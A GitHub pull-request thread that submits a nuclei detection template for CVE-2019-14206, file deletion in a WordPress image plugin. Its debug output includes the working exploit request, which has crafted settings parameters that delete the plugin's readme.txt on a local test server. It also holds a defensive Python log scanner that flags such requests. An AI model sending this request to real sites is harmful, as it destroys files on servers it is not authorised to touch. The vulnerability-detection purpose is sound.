@KrE80r KrE80r commented Jan 4, 2026

/claim 14693

Summary

  • Adds detection template for CVE-2019-14206 (Nevma Adaptive Images < 0.6.67 - Arbitrary File Deletion)
  • Tests actual file deletion, not just LFI/path traversal detection
  • Uses /tmp directory mtime as timing reference (reliable on active servers)

Template Details

| Field | Value |
|---|---|
| CVE | CVE-2019-14206 |
| Severity | Critical (CVSS 9.1) |
| Vendor | Nevma |
| Product | Adaptive Images for WordPress |
| CWE | CWE-22 (Path Traversal) |

Detection Method

  1. Verify plugin readme.txt exists (status 200)
  2. Trigger deletion via unsanitized adaptive-images-settings parameters
  3. Confirm readme.txt was deleted (status != 200)

Test Plan

  • Tested on vulnerable environment
  • Tested on non-vulnerable environment

Notes

Vulnerable environment shared privately.

Debug Output

nuclei -t CVE-2019-14206.yaml -u http://localhost:8080 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.8

                projectdiscovery.io

[INF] Current nuclei version: v3.3.8 (outdated)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 42
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

HTTP/1.1 200 OK
Connection: close
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 04 Jan 2026 09:22:35 GMT
Etag: "4a5b-6478c7a3bd900-gzip"
Last-Modified: Sun, 04 Jan 2026 09:22:12 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding


=== Adaptive Images for WordPress ===

Contributors: nevma
Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=WCES7V9D45HDS
Tags: adaptive images, responsive images, mobile images, resize images, optimize images, adaptive, responsive, mobile, resize, optimize, images
Requires at least: 4.0
Tested up to: 5.0
Stable tag: 0.6.65
License: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html

Adaptive images plugin transparently resizes your images, per device screen size, in order to reduce download times in mobile environments. 



== Description ==

= Adaptive Images =

Resizes and optimizes images delivered to mobile devices, in a transparent and unobtrusive way, so that the total download time is dramatically reduced. It works as a filter between the device and your WordPress website. It actually works for all types of device screen sizes, although it is targeted mostly at mobile environments. 

Note that this is not a CSS responsive images solution. This plugin does not force browsers to render images as if they were smaller. It actually sends smaller images to them! Then it is the job of the CSS to instruct the browsers how to render them. 

= Fundamental goals = 

 1. Reduce the total download time in mobile devices dramatically.
 2. Work transparantly and unobtrusively by being independant of your theme code.
 3. Be agnostic of the yet-not-finalized `picture` element or HTML img `srcset` attribute.

 = Side benefits =

 1. Respects search engines and sends them the orginal version of each image, because it depends on Javascript.
 2. If it does not recognise a device screen it falls over to the original image size. But even this is very rare and mostly refers to very old or possibly deprecated devices. 
 3. Does not need to load the WordPress ennironment in order to resize and compress images.

= Supported formats =

 - JPEG
 - PNG
 - GIF (not animated)

= CDN/Varnish/external caching service support =

Since version 0.6.0 CDN/Varnish/external caching service support has been added as an option, in an ***experimental*** mode. This mode is experimental in the following ways: i) it is not thorougly tested yet ii) however, it works in almost all test cases so far iii) it bears no dangers to your installation iv) it adds a special url parameter to your image urls, so it is slightly obtrusive.

Cannot work, not even in experimental mode, with CDNs which use a different subdomain for images, because these setups completely bypass WordPress when delivering images. Feel free to ask for details on this in the support forum.

= Default breakpoints =

 - 1024px wide screens
 - 640px wide screens
 - 480px wide screens

Since version 0.5.0 and upwards it is configurable whether the plugin should take into account the landscape or the portrait orientation of each device.

HiDPI (high device pixel density or retina) screens are supported too.

= How to test = 

 1. Test with Chrome&apos;s device emulation mode https://developer.chrome.com/devtools/docs/device-mode in Developer Tools. See here https://www.youtube.com/watch?v=hCAC1XUUOvw/ for an example. Unfortunately, Firefox&apos;s Responsive Design Mode does not actually emulate a mobile screen size!
 2. Test with a tool like Webpagetest http://www.webpagetest.org/. Make sure you set the "Emulate Mobile Browser" setting in the "Advanced Settings" > "Chrome" tab. 
 3. Test with a tool like GTmetrix http://gtmetrix.com/. Make sure you enable mobile device testing. The plugin will have no effect on desktop sized devices.
 4. Test with an actual mobile device, a smartphone or tablet. Watch your website load in a snap.
 5. Check the `/wp-contents/cache` directory to see the `/adaptive-images` directory and its contents. This is where the resized images are kept and cached by default.

Also you can:

 1. View an image straight from a browser and add a &quot;?debug=true&quot; at the end of the url like this &quot;http://www.website.com/wp-content/uploads/2015/01/image.jpg?debug=true&quot;. This should print useful debug information about the plugin functions in your installation. If you keep seeing your image, then the plugin is not working as it should and the cause is probably a failure to update the .htaccess file properly.
 2. Add a &quot;?debug=original&quot; at the end of the url of an image and you will see the orginal version of the image even when a smaller version of it should have been shown.
 3. Hit the &quot;Print debug&quot; and &quot;Print diagnostics&quot; buttons at the plugin settings page to see useful debug information about the plugin and your WordPress installation.

You could test with a normal desktop browser, but only if the computer screen size falls under at least of one of the specified breakpoints!

= Incompatibilities and issues = 

 - The plugin supports Nginx, but the server's configuration file must be manually configured like this:

```location / {
    rewrite \.(?:jpe?g|gif|png)$ /wp-content/plugins/adaptive-images/adaptive-images-script.php;
}```

 - Windows IIS is not supported, but could be manually configured. Any IIS experts are welcome to contribute.
 - Cannot work, not even in experimental mode, with CDNs which use a different subdomain for images. 
 - When using HTTPS/SSL make sure that you update all your website urls and also the urls in your WordPress General
   settings page, otherwise the plugin will not be able to locate your images. 

= Stuff to keep in mind = 

 - The plugin needs to add a little bit of code to your `.htaccess` file in order to function properly. It removes this code once disabled. If you are not cool with that, then&hellip; tough luck! 
 - The plugin does not care whether the device is actually mobile or not. It checks the device screen resolution. If you have set your breakpoints big enough then it should work just as good for desktop devices as well. However it targets mostly the mobile ones.
 - The resized versions of the pictures are kept in a special directory in the `/wp-content/cache` directory. This causes some storage overhead. It is up to you to judge whether this overhead is a sustainable option in your hosting environment.
 - The plugin does not help with (nor hinder) art direction. Simple as that. Art direction https://usecases.responsiveimages.org/#art-direction in responsive images is an entirely different, yet important, problem. This plugin does not tackle with it. But it works in a supplementary way without interfering with other solutions that do. This means that you can combine it with any art direction solution.

= Credits = 

 - The plugin was originally based on the WP-Resolutions plugin https://github.com/JorgenHookham/WP-Resolutions/, but since version 0.3.0 it is a complete rewrite!
 - Both plugins - WP-Resolutions and this one - have borrowed ideas from the Adaptive Images http://adaptive-images.com/ solution specially adapted for WordPress.
 - Many-many thanks to "railgunner" for the initial idea in the forum and to the Pressidium team for helping with debugging the CDN/Varnish/external caching service feature.
 - Thanks to "minorgod" for the Windows path fix.
 - Also, many thanks to my good friend and colleague Antonis Zachopoulos for the countless times that he provided ideas and debugging hints.

Thank you all for using and testing the plugin and, please, do let us know how it works (or doesn't work) for you. We love comments and creative feedback!



== Installation ==

= Usual process =

 1. Install the plugin via "Plugins &gt; Add New".
 2. Activate the plugin.
 3. Go to its settings and save them!

The plugin should simply work! 

De-activate the plugin to disable it. Activate the plugin to enable it. Delete it and it&apos;s gone. So simple. 



== Frequently Asked Questions ==

= What's the story? =

First came the Adaptive Images solution http://adaptive-images.com/ which is still there and works on its own. Then came the WP-Resolutions plugin https://github.com/JorgenHookham/WP-Resolutions. But it is not in the WordPress plugin repository anymore and the Github version is not compatible with the latest WordPress versions. So we are updating and maintaining it. Many under the hood changes have taken place, but the overall functionality is the same.

Since version 0.5.0 the plugin has been completely rewritten, in order to not rely on the Adaptive Images solution, which was released under a CC-BY license that is not compatible with the GPL. This problem has now been overcome and the part that used to rely on the Adaptive Images is brand new!

= Is this plugin heavy? =

Well, not much really. The image resizing process is not computationally negligible, but the images are only resized when they are first requested and then they are cached. However, it must be noted that the images in the watched directories, the ones the plugin is responsible for resizing and delivering, are ultimately delivered by a PHP script and not a generic server process! 

So actually one has to decide on a balance between creating and storing too many image sizes in contrast to burdening their server resources. 



== Screenshots ==

1. Plugin settings page in the admin area.
2. Resized versions of your images are cached by default in `/wp-content/cache/adaptive-images`.
3. Total web page load time is reduced dramatically on a mobile device (tested in http://webpagetest.org/).
4. Each device is served an image resized its real dimensions, therefore a lot smaller in total size.



== Upgrade Notice ==

= 0.6.63 =

The bug concerning the protocol (HTTP vs HTTPS) of the urls in your /wp-admin General > Settings being being the same as the protocol of your website has been fixed. 

= 0.6.62 =

It is recommended for users to save one&apos;s settings anew, especially if their installation is in a subdirectory or if they have renamed their wp-content or uploads directory.

= 0.5.0 =

It is recommended, but not absolutely necessary, to save one&apos;s settings anew, due to the big changes in the image resizing script, which was completely re-written, renamed and relocated inside the plugin&apos;s directories since this version. 

= 0.3.0 =

Ater upgrading to version 0.3.0 you will need to:

 - Save your settings anew. If you do not then the plugin will operate with its current default settings without problems as it is expected.
 - Manually delete the old image cache directory `/wp-content/cache-ai`. The new default image cache directory is `/wp-content/cache/adaptive-images`.

Apologies for the inconvenience! We are still in early versions. What is important is that the plugin actually works as intended. We try to minimize the hassle between these versions. This is not expected to happen pretty often.



== Changelog ==

= 0.6.65 =

 - Fixed minor regular expression issue that appeared in PHP 7.3 and caused the cache directory and watched directories to be saved as empty strings. 

= 0.6.64 =

 - Windows path fix (thanks to @minorgod). 

= 0.6.63 =

 - Bug fix when HTTPS was reported as "On" vs "on" in PHP. Now the comparison is case insensitive.
 - Bug fix to completely disregard request protocol (HTTP vs HTTPS) when resolving image paths from request urls. 

= 0.6.62 =

 - Bug fix handling decimal device pixel density.
 - Bug fix when the wp-content and/or uploads directories have been renamed.
 - Bug fix when WordPress installation is in a subdirectory, but the website url remains in the root directory.
 - Settings page user interface corrections.

= 0.6.61 =

 - Added notice for NginX's manual configuration.
 - Minor bug fixes.

= 0.6.60 =

 - Removed PNG8 compression for PNGs because it was not peoducing acceptable quality results. PNGs are now simply resized and compressed via normal 32bit PNG compression. In future versions there will be an option to enable and disable PNG8 compression at will and perhaps a way for the plugin to detect in which images it should apply PNG8 compression and in which others to apply 32bit PNG compression.

= 0.6.51 =

 - Just an update to the plugin version, because 0.6.41 was coming before 0.6.5, due to a lexicographical sorting and was not available as an update in the repository!

= 0.6.5 =

 - PHP warning in adaptive images script removed.

= 0.6.42 =

 - Minor bug fix when saving plugin settings.

= 0.6.41 =

 - Version 0.6.4 bug fix caused a new bug in image path resolution when the WordPress is installed in a subdirectory of the server root directory.

= 0.6.4 =

 - Fixed bug wp-content dir resolution within the standalone Adaptive Images image handling scrips, where sometimes the server document root was not reported by PHP as being the same as the WordPress installation path. 

= 0.6.3 =

 - Fixed bug in htaccess rewrite rules generation when installation is not in root directory.
 - Fixed bug in image delivery script where browser cache was not set correctly in some case.

= 0.6.2 =

 - Fixed bug where WordPress installation root directory was not calculated correctly in certain cases.

= 0.6.1 =

CDN/Varnish compatibility improved. Previously some images were downloaded in both their original and their resized version. Now they are only downloaded once. However if the website is too fast there may be 1-2 images that might manage to download in their original size. We guess that is OK, though.

= 0.6.0 =

 - Added CDN/Varnish/external caching service support.
 - Added Thickbox confirmation dialog on the cache cleanup button in the plugin settings page.
 - Added donation button in the plugin settings page.
 - Documentation stuff.

= 0.5.2 =

 - Fixed a bug where the path of the image resizing script was not correctly created in the `.htaccess` file (again).

= 0.5.1 =

 - Fixed a bug where the path of the image resizing script was not correctly created in the `.htaccess` file.
 - Some documentation.

= 0.5.0 =

 - New option in settings to define whether the plugin should use the bigger dimension of a device as its with or take into account the current orientation. Up to now the plugin used the width of the landscape orientation, which is the biggest of each device&apos;s dimensions.
 - New option in settings to define whether the plugin should use take special care for HiDPI (retina, high pixel density screens and serve these devices better quality images according to their pixel density.
 - Better PNG compression via PNG8. This converts true color PNG images to palette image, which reduces colours and the alpha channel Kudos http://stackoverflow.com/questions/5752514/how-to-convert-png-to-8-bit-png-using-php-gd-library/.
 - Fixed some edge cases of not being able to serve a resized image by reverting to original image. 
 - More analytical settings page debugging and diagnostics.
 - Added debugging methods in the image cache generation script.
 - Plugin can be configured to respect your default expires headers.
 - Some documentation stuff (as always).
 - Completely rewritten the script that generates and caches the resized versions of images in order to avoid the GPL vs CC-BY-3.0 licensing incompatibility of the original Adaptive Images script (http://adaptive-images.com/). Plugin is now totally independant and free of any licensing issues.
 - Due to the above, the image resizing script is no longer the same, it has been transformed to a new script, named `adaptive-images-script.php` which is in the root folder of the plugin. However the old script is still left inside the plugin folders for compatibility purposes (old versions and users not having saved their settings anew).

= 0.3.52 =

 - Documentation stuff.

= 0.3.51 =

 - Minor bug in settings page url parameters.
 - Documentation stuff.

= 0.3.5 =

 - Allow for default browser cache settings.
 - More thorough debugging information.
 - Added diagnostics debugging in the settings page.
 - Nicer admin area user messages with icons.
 - Minor fixes here (and there).
 - Documentation enhancements.

= 0.3.04 =

 - Documentation enhancements (yeah).
 - Added &quot;noptimize&quot; tag in HEAD Javascript to exclude it from optimizers.

= 0.3.03 =

 - Added Last-modified HTTP header for resized images, as the best practices do suggest.

= 0.3.02 =

 - When no device size/resolution is detected then show the original image. Helps avoid misunderstandings and sends search engines the actual images instead of the resized ones.

= 0.3.01 =

 - Documentation enhancements.

= 0.3.0 =

 - Almost a complete rewrite of the code.
 - Completely updated the settings page to be user friendly.
 - Added action in the settings page for cache cleanup.
 - Added action in the settings page for debug info.
 - Added action in the settings page for cache size calculation.
 - Added watched directories field in the settings page anew.
 - Divided the plugin files into logical parts.
 - Default resolutions changed to 1024, 640 and 480 because the cookie is set based on the max value between screen width and height and most screens have a height between 480 and 640px. Tablets are between 640 and 1024px wide/tall. The iPad is 1024px tall. A screen with a width higher than 1024px is probably not a mobile screen.
 - Changed default image cache directory in order to place it inside the expected WordPress `/wp-content/cache` directory, so now by default it is `/wp-content/cache/adaptive-images`.
 - Added check for the plugin options.
 - Added check for the PHP GD library.
 - Added check for the .htaccess file.
 - Added upgrade from older versions functions.
 - Added upgrade from 0.2.08 to 0.3.0 versions functions.
 - Added unistall script `uninstall.php`.
 - Documentation enhancements (as usual).

= 0.2.08 =

 - Added cache size calculation.
 - Added cache clean up methods.
 - Added nonces to admin actions.
 - Documentation enhancements.

= 0.2.06 =

 - Settings are now separate in an ai-user-settings.php file.

= 0.2.05 =

 - If the original requested image width and the device screen size are bigger than maximum available breakpoint, then serve the the original image. 

= 0.2.04 =

 - Refactoring code.

= 0.2.03 =

 - Set the default screen size breakpoints to 1024, 600, 320.

= 0.2.02 =

 - Refactoring code to separate Adaptive Images files from the other plugin files.

= 0.2.01 =

 - The first stable version after the initial fork.
 - Corrected basic PHP errors.
 - Corrected basic WordPress errors.
 - Now compatible with version 4.1.1.
 - New document root takes into account installations in subdirectories.

= 0.1 =

 - The version forked from the WP Resolutions plugin https://github.com/JorgenHookham/WP-Resolutions.
 - This version does not work with WordPress anymore (at least version 4.1.1 and upwards).
[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8080/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1

GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8080/wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1

HTTP/1.1 200 OK
Connection: close
Content-Type: image/jpeg
Date: Sun, 04 Jan 2026 09:22:35 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.3.11
Content-Length: 0

[INF] [CVE-2019-14206] Dumped HTTP request for http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2019-14206] Dumped HTTP response http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

HTTP/1.1 302 Found
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Jan 2026 09:22:35 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Location: http://localhost:8080/wp-admin/install.php
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.3.11
X-Redirect-By: WordPress
Content-Length: 0

[CVE-2019-14206:dsl-1] [http] [critical] http://localhost:8080/wp-content/plugins/adaptive-images/readme.txt

References

Nevma Adaptive Images < 0.6.67 arbitrary file deletion
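
Added example (not part of the PR or the nuclei template): a log check a defender could run for the request shown in the debug output above, flagging any request to `adaptive-images-script.php` that carries `adaptive-images-settings[...]` query parameters. The log format, sample lines and function names are constructed for illustration, and the check assumes legitimate traffic never supplies these parameters.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (Apache common-log style); not from a real server.
# The first request line reuses the query string shown in the debug output.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2026:09:22:35 +0000] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480&adaptive-images-settings%5Bsource_file%5D=/tmp&adaptive-images-settings%5Bresolution%5D&adaptive-images-settings%5Bwp_content%5D=/var/www/html/wp-content&adaptive-images-settings%5Bcache_dir%5D=.&adaptive-images-settings%5Brequest_uri%5D=plugins/adaptive-images/readme.txt&adaptive-images-settings%5Bwatch_cache%5D=1 HTTP/1.1" 200 0
198.51.100.4 - - [04/Jan/2026:09:23:01 +0000] "GET /wp-content/uploads/2015/01/image.jpg?debug=true HTTP/1.1" 200 5120
198.51.100.9 - - [04/Jan/2026:09:23:10 +0000] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?resolution=480 HTTP/1.1" 200 0
203.0.113.7 - - [04/Jan/2026:09:23:12 +0000] "GET /wp-content/plugins/adaptive-images/readme.txt HTTP/1.1" 302 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_NAME = "adaptive-images-script.php"
SETTINGS_KEY_RE = re.compile(r"^adaptive-images-settings\[([^\]]*)\]$")
# Settings that carried filesystem paths in the request on this page.
PATH_KEYS = ("wp_content", "cache_dir", "request_uri")


def client_supplied_settings(target):
    """Return {key: value} for adaptive-images-settings[...] query parameters
    sent to the plugin's image script, or {} for any other request."""
    parts = urlsplit(target)
    # Decode the path so a percent-encoded script name still matches.
    if unquote(parts.path).rsplit("/", 1)[-1] != SCRIPT_NAME:
        return {}
    found = {}
    # parse_qsl percent-decodes names, so %5B/%5D and literal [ ] both match.
    # keep_blank_values keeps parameters that were sent without a value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        m = SETTINGS_KEY_RE.match(name)
        if m:
            found[m.group(1)] = value
    return found


def scan(log_text):
    """Return one finding per log line whose query string overrides plugin settings.
    Only the query string is visible in an access log; request bodies are not covered."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        settings = client_supplied_settings(m["target"])
        if settings:
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "time": m["ts"],
                "status": int(m["status"]),
                "keys": sorted(settings),
                # Values to compare against files that have gone missing.
                "paths": {k: settings[k] for k in PATH_KEYS if k in settings},
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
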
@DhiyaneshGeek
Member

Hi @KrE80r,

Thanks for participating in the Bounty Claim Program.

We are moving forward with this PR #14694, which met all the requirements.

Due to the following reason, we are closing this PR.

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jan 5, 2026